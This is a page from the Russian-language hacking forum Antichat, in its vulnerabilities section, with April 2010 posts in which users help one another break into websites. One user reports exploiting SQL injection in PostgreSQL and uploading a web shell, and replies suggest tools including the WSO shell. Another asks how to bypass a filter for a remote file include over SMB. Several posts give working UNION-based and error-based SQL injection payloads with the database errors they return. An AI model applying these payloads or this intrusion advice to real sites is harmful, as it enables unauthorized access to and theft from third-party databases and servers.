ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12751  
Старый 26.04.2010, 01:23
Аватар для auth_root
auth_root
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455

Репутация: 18
По умолчанию

Pashkela
Это чем?
 
Ответить с цитированием

  #12752  
Старый 26.04.2010, 09:42
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

раскрутил скулю Postgresql, залил шелл..но на сервере крутится еще и MySQL.. как мне к базе с постгре подключится? к мускулю подключение нормальноe
 
Ответить с цитированием

  #12753  
Старый 26.04.2010, 09:53
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Gorev  
раскрутил скулю Postgresql, залил шелл..но на сервере крутится еще и MySQL.. как мне к базе с постгре подключится? к мускулю подключение нормальноe

http://phppgadmin.sourceforge.net/
 
Ответить с цитированием

  #12754  
Старый 26.04.2010, 10:26
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

Как вариант WSO
 
Ответить с цитированием

  #12755  
Старый 26.04.2010, 15:23
Аватар для budden
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031

Репутация: 184
По умолчанию

Цитата:
Сообщение от budden  
Подскажите, возможно ли как-нибудь все-таки скормить урл для include($MEGA-VARIABLE.'file.php'), если перед этим он редактируется вот так:
preg_replace( "/[a-z]/i", "", $MEGA-VARIABLE);

Или без вариантов?

PS Можно айпи дать напрямую, но http съедается..
Продолжаю с этим копаться.
Посмотрел сюда: http://www.php.net/manual/en/wrappers.file.php
И увидел такой вариант:
\\smbserver\share\path\to\winfile.ext
Получится ли у меня сделать финт вот так:
$MEGA-VARIABLE=\\192.192.192.192\123 ?
А в share уже положив \123\file.php с текстовой отдачей?
Если да, то подскажите please как можно по-быстрому на линуксе share сделать? только samba или есть что полегче?
 
Ответить с цитированием

  #12756  
Старый 26.04.2010, 17:41
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от budden  
Продолжаю с этим копаться.
Посмотрел сюда: http://www.php.net/manual/en/wrappers.file.php
И увидел такой вариант:
\\smbserver\share\path\to\winfile.ext
Получится ли у меня сделать финт вот так:
$MEGA-VARIABLE=\\192.192.192.192\123 ?
А в share уже положив \123\file.php с текстовой отдачей?
Если да, то подскажите please как можно по-быстрому на линуксе share сделать? только samba или есть что полегче?
почему бы не попробовать?

Цитата:
\\smbserver\share\path\to\winfile.ext
это только для венды
 
Ответить с цитированием

  #12757  
Старый 26.04.2010, 19:17
Аватар для Nek1t
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

Есть иньекция, но в интересных условиях.
В кратце: уязвимый параметр используется в нескольких запросах. Скрипт выплевывает данные только после успешной обработки всех запросов. Проблема в том, что количество столбцов в запросах разное.
Т.е. подбираешь количество столбцов в первом в запросе, он выполняется, а на следующем скрипт крэшится. Из вывода в итоге получаются только ошибки, скрипт просто не дорабатывает до конца.

PHP код:
http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5--+ 
PHP код:
MySQL error occured on line 68 in file index.php.
Error 1222The used SELECT statements have a different number of columns
Query
: [..query2..] 
PHP код:
http://site.com/index.php?cat=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--+ 
PHP код:
MySQL error occured on line 21 in file index.php.
Error 1222The used SELECT statements have a different number of columns
Query
: [..query1..] 

Any ideas?

Последний раз редактировалось Nek1t; 26.04.2010 в 19:25..
 
Ответить с цитированием

  #12758  
Старый 26.04.2010, 19:40
Аватар для Nek1t
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

Все правильно делаю?
Ошибку не выдает, пишет item not found, т.е. сам скрипт что-то отлавливает и не выводит MySQL'ную ошибку?

PHP код:
index.php?id=-1+union+select+count(*),concat(version(),floor(rand(0)*2)),3,4,5,6,7,8,9,10,11+x+from+users+group+by+x--+ 
где users - существующая таблица.
 
Ответить с цитированием

  #12759  
Старый 26.04.2010, 20:00
Аватар для LokbatanLi
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

tak probuy

http://site.com/index.php?cat=(select*from(select+name_const(versi on(),1),name_const(version(),1))a)
 
Ответить с цитированием

  #12760  
Старый 26.04.2010, 20:24
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Цитата:
Сообщение от Ctacok  
Вывод ошибок есть.

PHP код:
http://site.com/index.php?cat=-1+select count(*),concat(version(),floor(rand(0)*2)) x from table group by x; 
капец просто
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ